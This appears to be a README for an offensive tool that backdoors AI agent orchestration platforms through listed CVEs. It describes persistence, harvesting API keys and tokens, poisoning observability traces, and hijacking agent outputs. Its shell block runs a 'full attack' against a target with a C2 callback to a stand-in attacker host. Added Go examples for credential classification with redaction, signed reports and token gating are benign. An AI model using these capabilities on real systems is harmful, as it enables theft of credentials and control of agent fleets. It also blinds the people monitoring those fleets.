The world's first offensive tool targeting the AI agent orchestration control plane. One foothold = fleet-wide control. ZOMBIE hooks the agent. APEX backdoors the orchestrator.
SPECTER APEX targets the orchestration layer — the control plane that coordinates all AI agents. Where T123 SPECTER ZOMBIE implants individual agents, APEX backdoors the orchestrator itself. Compromise the orchestrator once, control the entire fleet silently.
Kill chain: ZOMBIE (hook agent) → APEX (backdoor orchestrator) → fleet operates under attacker control without touching any individual agent configuration.
Introduces L24 — AI Agent Orchestration Exploitation as a new NIGHTFALL attack layer.
⚠ Authorised security testing only. All exploitation capabilities require INJECT/UNLEASHED gate tokens.
| CVE | Platform | CVSS | Vector | Status |
|---|---|---|---|---|
| CVE-2025-25289 | CrewAI ≤0.28.0 | 9.1 | YAML deserialisation → RCE in orchestrator process | Patched 0.29.0 |
| CVE-2025-32168 | AutoGen | — | Message routing manipulation in GroupChat → task redirect | Patched |
| CVE-2026-21858 | n8n ≤1.65.0 | 10.0 | Content-type confusion webhook → unauthenticated RCE | Patched 1.121.0 |
| CVE-2026-33017 | Langflow <1.8.2 | 9.3 | Unauthenticated flow build RCE — CISA KEV, exploited in wild | Patched 1.8.2 |
Also covers LangGraph StateGraph shared-state ACL bypass (design issue, no CVE) and Flowise unauthenticated credential endpoint.
HTTP fingerprinting across all target platforms. Detects orchestrator type, version, exposed APIs, connected agent fleet, message brokers, state stores, auth mechanisms.
Exploit CVEs per platform — YAML RCE (CrewAI), content-type confusion (n8n), flow build endpoint (Langflow), GroupChat routing (AutoGen), StateDict poison (LangGraph).
Persistence mechanism per platform: Python package patch (CrewAI), SQLite workflow injection (n8n), custom component injection (Langflow), checkpointer patch (LangGraph). Survives orchestrator restart.
Extract all credentials from orchestrator config, env vars, and config files. Classifies: OpenAI/Anthropic API keys, LangSmith/Langfuse credentials, OAuth tokens, database URLs.
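An added example of the value classification the harvest step describes, not the project's code: it walks a constructed dotenv file, classifies each value by shape, and redacts rather than reports the secret. The key prefixes in the classifier table are assumptions about current provider key formats; the `Finding`, `Scan` and `Classify` names are this example's own. The same scan, run by a defender over an orchestrator's own config, shows what a harvest would collect.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one credential-bearing assignment found in orchestrator
// configuration text (dotenv files, shell exports, compose environment blocks).
type Finding struct {
	Kind     string // credential class, e.g. "openai_api_key"
	Key      string // variable name the value was bound to
	Redacted string // short prefix plus length; the secret itself is not kept
}

// classifiers pair a credential class with the shape its value takes. The
// prefixes are assumptions about current provider key formats, not from the
// page. Order matters: sk-ant- and sk-lf- are listed before the generic
// OpenAI sk- shape, which would otherwise swallow them.
var classifiers = []struct {
	kind string
	re   *regexp.Regexp
}{
	{"anthropic_api_key", regexp.MustCompile(`^sk-ant-[A-Za-z0-9_-]{20,}$`)},
	{"langfuse_secret_key", regexp.MustCompile(`^sk-lf-[0-9a-f-]{20,}$`)},
	{"langfuse_public_key", regexp.MustCompile(`^pk-lf-[0-9a-f-]{20,}$`)},
	{"langsmith_api_key", regexp.MustCompile(`^lsv2_[a-z]{2}_[A-Za-z0-9_]{20,}$`)},
	{"openai_api_key", regexp.MustCompile(`^sk-(?:proj-)?[A-Za-z0-9_-]{20,}$`)},
	// only URLs that embed credentials (user:pass@host) are flagged
	{"database_url", regexp.MustCompile(`^(?:postgres(?:ql)?|mysql|redis|mongodb(?:\+srv)?)://[^@\s]+@\S+$`)},
	{"oauth_token", regexp.MustCompile(`^(?:ya29\.|gho_|ghp_)[A-Za-z0-9_.-]{16,}$`)},
}

// Classify returns the credential class of one value, or "" for ordinary
// configuration such as ports and log levels.
func Classify(value string) string {
	for _, c := range classifiers {
		if c.re.MatchString(value) {
			return c.kind
		}
	}
	return ""
}

// redact keeps a 6-character prefix and the length, enough to correlate a
// finding with the real secret without copying it into a report.
func redact(v string) string {
	if len(v) <= 8 {
		return "***"
	}
	return fmt.Sprintf("%s...(%d chars)", v[:6], len(v))
}

// Scan walks KEY=VALUE lines, strips a leading "export " and surrounding
// quotes, and classifies each value. Comments, blank lines and lines without
// "=" are skipped.
func Scan(text string) []Finding {
	var out []Finding
	for _, raw := range strings.Split(text, "\n") {
		line := strings.TrimSpace(raw)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		line = strings.TrimPrefix(line, "export ")
		parts := strings.SplitN(line, "=", 2)
		if len(parts) != 2 {
			continue
		}
		value := strings.Trim(strings.TrimSpace(parts[1]), `"'`)
		if kind := Classify(value); kind != "" {
			out = append(out, Finding{Kind: kind, Key: strings.TrimSpace(parts[0]), Redacted: redact(value)})
		}
	}
	return out
}

// sampleEnv is a constructed dotenv file; none of these values are real keys.
const sampleEnv = `# constructed sample, not captured from any system
export OPENAI_API_KEY=sk-proj-AbCdEfGhIjKlMnOpQrStUvWxYz0123
ANTHROPIC_API_KEY="sk-ant-api03-AbCdEfGhIjKlMnOpQrStUvWxYz0123"
LANGCHAIN_API_KEY=lsv2_pt_0123456789abcdef0123456789abcdef
LANGFUSE_SECRET_KEY=sk-lf-0123abcd-4567-89ef-0123-456789abcdef
DATABASE_URL=postgresql://n8n:hunter2@db.internal:5432/n8n
N8N_PORT=5678
LOG_LEVEL=debug
`

func main() {
	for _, f := range Scan(sampleEnv) {
		fmt.Printf("%-22s %-20s %s\n", f.Kind, f.Key, f.Redacted)
	}
}
```

Anchored whole-value matching is deliberate: the scanner parses assignments rather than grepping free text, so a key prefix buried inside a longer unrelated string does not produce a finding, and a database URL without embedded credentials is left alone.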
Suppress orchestrator logging, override LangChain callbacks, poison LangSmith and Langfuse traces with false entries, delete task history, inject noise into Arize Phoenix / AgentOps.
Hijack agent task outputs to attacker-controlled endpoint. Spawn attacker-controlled agents via orchestrator API. Inject false task completions into orchestrator state.
WARLORD-compatible JSON with Ed25519 signing. Report IDs carry an APX-{hex12} prefix. Mermaid architecture map, MITRE ATLAS/ATT&CK mapping, L24 classification, backdoor survival proof.
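An added example of the report envelope described above, not the project's code. The page gives only JSON, Ed25519 and the APX-{hex12} prefix, so the `Report` body shape and the `SignedReport` wrapper are assumptions. `Verify` checks the signature over the stored bytes before parsing them and pins the signer's public key, which is the check a consumer of these reports should make before trusting the survival proof inside.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
	"regexp"
)

// Report is an assumed minimal WARLORD-compatible body; the real schema is
// not on the page.
type Report struct {
	ID       string   `json:"id"` // APX-<12 lowercase hex chars>
	Target   string   `json:"target"`
	Layer    string   `json:"layer"`
	Findings []string `json:"findings"`
}

// SignedReport carries the exact bytes that were signed, so a verifier never
// re-serialises the body and risks a canonicalisation mismatch.
type SignedReport struct {
	Report    json.RawMessage `json:"report"`
	PublicKey string          `json:"public_key"` // hex, 32 bytes
	Signature string          `json:"signature"`  // hex, 64 bytes, over Report
}

var reportIDShape = regexp.MustCompile(`^APX-[0-9a-f]{12}$`)

// NewReportID draws 6 random bytes and renders them as 12 lowercase hex chars.
func NewReportID() (string, error) {
	var b [6]byte
	if _, err := rand.Read(b[:]); err != nil {
		return "", err
	}
	return "APX-" + hex.EncodeToString(b[:]), nil
}

// ValidReportID accepts only the APX-{hex12} shape.
func ValidReportID(id string) bool { return reportIDShape.MatchString(id) }

// NewKeypair generates an Ed25519 signing key from the OS CSPRNG.
func NewKeypair() (ed25519.PublicKey, ed25519.PrivateKey, error) {
	return ed25519.GenerateKey(rand.Reader)
}

// Sign serialises the report once and signs exactly those bytes.
func Sign(priv ed25519.PrivateKey, r Report) (SignedReport, error) {
	if !ValidReportID(r.ID) {
		return SignedReport{}, fmt.Errorf("report id %q is not APX-{hex12}", r.ID)
	}
	body, err := json.Marshal(r)
	if err != nil {
		return SignedReport{}, err
	}
	pub := priv.Public().(ed25519.PublicKey)
	return SignedReport{
		Report:    body,
		PublicKey: hex.EncodeToString(pub),
		Signature: hex.EncodeToString(ed25519.Sign(priv, body)),
	}, nil
}

// Verify rejects a report whose embedded key is not the pinned trustedPub,
// whose signature does not cover the stored bytes, or whose id is malformed.
// Signature comes first: untrusted JSON is never parsed before it is checked.
func Verify(trustedPub ed25519.PublicKey, s SignedReport) (Report, error) {
	pub, err := hex.DecodeString(s.PublicKey)
	if err != nil || len(pub) != ed25519.PublicKeySize {
		return Report{}, errors.New("malformed public key")
	}
	if !trustedPub.Equal(ed25519.PublicKey(pub)) {
		return Report{}, errors.New("report signed by an unpinned key")
	}
	sig, err := hex.DecodeString(s.Signature)
	if err != nil || len(sig) != ed25519.SignatureSize {
		return Report{}, errors.New("malformed signature")
	}
	if !ed25519.Verify(pub, s.Report, sig) {
		return Report{}, errors.New("signature does not match report bytes")
	}
	var r Report
	if err := json.Unmarshal(s.Report, &r); err != nil {
		return Report{}, err
	}
	if !ValidReportID(r.ID) {
		return Report{}, fmt.Errorf("report id %q is not APX-{hex12}", r.ID)
	}
	return r, nil
}

func main() {
	pub, priv, err := NewKeypair()
	if err != nil {
		panic(err)
	}
	id, _ := NewReportID()
	sr, err := Sign(priv, Report{ID: id, Target: "http://orchestrator:5678", Layer: "L24",
		Findings: []string{"constructed finding: orchestrator API reachable without auth"}})
	if err != nil {
		panic(err)
	}
	out, _ := json.MarshalIndent(sr, "", "  ")
	fmt.Println(string(out))
	r, err := Verify(pub, sr)
	fmt.Println("verified:", err == nil, r.ID)
}
```

Pinning the public key matters because the envelope carries its own key: without the pin, anyone can produce a self-consistent forged report, and the signature proves nothing about who ran the engagement.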
```sh
pip install specter-apex

# Gate tokens
export APEX_INJECT_TOKEN=$(openssl rand -hex 32)
export APEX_UNLEASHED_TOKEN=$(openssl rand -hex 32)

# Enumerate target
specter-apex enumerate --target http://orchestrator:5678

# Full pipeline (read-only)
specter-apex engage --target http://orchestrator:5678

# Full attack
specter-apex engage --target http://orchestrator:5678 \
  --unleashed --confirm-destroy \
  --c2 http://attacker:9999
```
- OPEN: enumerate, report, sessions
- INJECT: infiltrate, backdoor
- UNLEASHED: harvest, liar
- UNLEASHED + --confirm-destroy: redirect, harvest
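An added example of how a tiered gate like this can be enforced, not the project's code: the tiers and the command table are the page's, while `Gate`, `Request`, and the idea that registered token values are compared against the presented APEX_*_TOKEN values are assumptions. It fails closed when a registered or presented token is empty, compares in constant time, refuses unknown commands, and requires the explicit confirm flag for the destructive tier.

```go
package main

import (
	"crypto/subtle"
	"errors"
	"fmt"
)

// Tier is the gate a command must clear. The tiers and the command-to-tier
// table come from the page; everything else here is an assumed implementation.
type Tier int

const (
	Open      Tier = iota // no token required
	Inject                // APEX_INJECT_TOKEN must be presented
	Unleashed             // APEX_UNLEASHED_TOKEN must be presented
	Destroy               // Unleashed token plus an explicit --confirm-destroy
)

var requiredTier = map[string]Tier{
	"enumerate": Open, "report": Open, "sessions": Open,
	"infiltrate": Inject, "backdoor": Inject,
	"harvest": Unleashed, "liar": Unleashed, // the page also lists harvest under the destroy tier
	"redirect": Destroy,
}

// Gate holds the token values the operator registered (assumed to be loaded
// from a config file at startup). Tokens presented on each call come from
// the APEX_*_TOKEN environment variables shown on the page.
type Gate struct {
	InjectToken    string
	UnleashedToken string
}

// Request is what the CLI presents for one command.
type Request struct {
	Command        string
	InjectToken    string
	UnleashedToken string
	ConfirmDestroy bool
}

// tokenMatches fails closed (an unset registered token or an empty presented
// token never authorises anything) and compares in constant time so a
// mismatch cannot be distinguished by timing.
func tokenMatches(registered, presented string) bool {
	if registered == "" || presented == "" {
		return false
	}
	return subtle.ConstantTimeCompare([]byte(registered), []byte(presented)) == 1
}

// Authorize returns nil when the request clears its tier, otherwise an error
// naming the gate that blocked it. Unknown commands are refused.
func (g Gate) Authorize(r Request) error {
	tier, known := requiredTier[r.Command]
	if !known {
		return fmt.Errorf("unknown command %q: refused", r.Command)
	}
	switch tier {
	case Open:
		return nil
	case Inject:
		if !tokenMatches(g.InjectToken, r.InjectToken) {
			return errors.New("INJECT gate: token missing or mismatched")
		}
		return nil
	case Unleashed, Destroy:
		if !tokenMatches(g.UnleashedToken, r.UnleashedToken) {
			return errors.New("UNLEASHED gate: token missing or mismatched")
		}
		if tier == Destroy && !r.ConfirmDestroy {
			return errors.New("destructive command: --confirm-destroy not given")
		}
		return nil
	}
	return errors.New("unreachable tier")
}

func main() {
	g := Gate{InjectToken: "inject-secret", UnleashedToken: "unleashed-secret"} // constructed values
	for _, r := range []Request{
		{Command: "enumerate"},
		{Command: "backdoor"},
		{Command: "backdoor", InjectToken: "inject-secret"},
		{Command: "redirect", UnleashedToken: "unleashed-secret"},
		{Command: "redirect", UnleashedToken: "unleashed-secret", ConfirmDestroy: true},
	} {
		fmt.Printf("%-10s confirm=%-5v -> %v\n", r.Command, r.ConfirmDestroy, g.Authorize(r))
	}
}
```

The empty-token check is the part most often omitted: if the registered value is unset and the gate only compares strings, an unset environment variable on both sides compares equal and silently opens every tier.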
ATLAS: AML.T0053 (LLM Plugin Compromise), AML.T0051.000 (LLM Prompt Injection: Direct), AML.T0024 (Exfiltration via ML Inference API), AML.T0018 (Backdoor ML Model)
ATT&CK: T1190 (Exploit Public-Facing Application), T1059.006 (Command and Scripting Interpreter: Python), T1546 (Event Triggered Execution), T1562.001 (Impair Defenses: Disable or Modify Tools), T1036 (Masquerading)